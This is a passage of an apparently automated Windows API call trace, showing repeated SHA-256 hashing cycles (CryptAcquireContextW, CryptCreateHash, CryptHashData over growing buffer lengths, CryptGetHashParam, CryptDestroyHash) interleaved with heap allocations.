	[0225.058] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779e78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779e78, pdwDataLen=0x128ba4) returned 1
	[0225.058] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.058] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.058] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.058] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.058] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0225.058] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ea0
	[0225.058] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779ea0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ea0, pdwDataLen=0x128ba4) returned 1
	[0225.058] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.058] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.058] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.059] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.059] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0225.059] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ec8
	[0225.059] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779ec8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ec8, pdwDataLen=0x128ba4) returned 1
	[0225.059] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.059] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.059] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.059] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.059] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0225.060] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ef0
	[0225.060] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779ef0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ef0, pdwDataLen=0x128ba4) returned 1
	[0225.060] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.060] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.060] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.060] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.060] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0225.060] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779f18
	[0225.060] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779f18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779f18, pdwDataLen=0x128ba4) returned 1
	[0225.060] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.060] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.060] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.060] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.060] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0225.061] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779f40
	[0225.061] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779f40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779f40, pdwDataLen=0x128ba4) returned 1
	[0225.061] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.061] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.061] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.061] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.061] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0225.061] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779f68
	[0225.061] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779f68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779f68, pdwDataLen=0x128ba4) returned 1
	[0225.061] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.061] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.061] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.061] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.062] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0225.062] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779f90
	[0225.062] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779f90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779f90, pdwDataLen=0x128ba4) returned 1
	[0225.062] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.062] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.062] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.063] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.063] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0225.063] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779fb8
	[0225.063] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779fb8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779fb8, pdwDataLen=0x128ba4) returned 1
	[0225.063] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.063] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.063] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.063] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.063] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0225.063] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779fe0
	[0225.063] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779fe0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779fe0, pdwDataLen=0x128ba4) returned 1
	[0225.063] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.063] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.063] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.064] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.064] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0225.064] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a008
	[0225.064] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a008, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a008, pdwDataLen=0x128ba4) returned 1
	[0225.064] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.064] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.064] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.064] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.064] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0225.064] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a030
	[0225.064] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a030, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a030, pdwDataLen=0x128ba4) returned 1
	[0225.064] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.064] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.065] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.065] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.065] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0225.065] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a058
	[0225.065] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a058, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a058, pdwDataLen=0x128ba4) returned 1
	[0225.065] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.065] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.065] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.065] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.066] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0225.066] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a080
	[0225.066] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a080, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a080, pdwDataLen=0x128ba4) returned 1
	[0225.066] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.066] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.066] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.066] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.066] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0225.066] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a0a8
	[0225.066] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a0a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a0a8, pdwDataLen=0x128ba4) returned 1
	[0225.066] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.066] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.066] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.067] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.067] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0225.067] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a0d0
	[0225.067] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a0d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a0d0, pdwDataLen=0x128ba4) returned 1
	[0225.067] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.067] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.067] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.067] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.067] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0225.067] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a0f8
	[0225.067] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a0f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a0f8, pdwDataLen=0x128ba4) returned 1
	[0225.067] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.067] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.067] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.068] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.068] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0225.068] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a120
	[0225.068] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a120, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a120, pdwDataLen=0x128ba4) returned 1
	[0225.068] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.068] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.068] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.068] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.068] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0225.068] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a148
	[0225.068] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a148, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a148, pdwDataLen=0x128ba4) returned 1
	[0225.068] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.068] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.068] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.069] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.069] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0225.069] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a170
	[0225.069] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a170, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a170, pdwDataLen=0x128ba4) returned 1
	[0225.069] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.069] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.069] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.069] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.069] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0225.069] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a198
	[0225.069] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a198, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a198, pdwDataLen=0x128ba4) returned 1
	[0225.069] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.069] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.069] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.070] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.070] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0225.070] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a1c0
	[0225.070] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a1c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a1c0, pdwDataLen=0x128ba4) returned 1
	[0225.070] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.070] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.070] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2764c60) returned 1
	[0225.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2764c60
	[0225.070] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.070] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.070] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0225.070] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a1e8
	[0225.070] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a1e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a1e8, pdwDataLen=0x128ba4) returned 1
	[0225.070] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.070] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.070] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.071] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.071] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0225.071] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a210
	[0225.071] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a210, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a210, pdwDataLen=0x128ba4) returned 1
	[0225.071] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.071] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.071] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.071] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.071] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0225.071] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a238
	[0225.071] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a238, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a238, pdwDataLen=0x128ba4) returned 1
	[0225.071] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.071] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.071] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.072] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.072] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0225.072] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a260
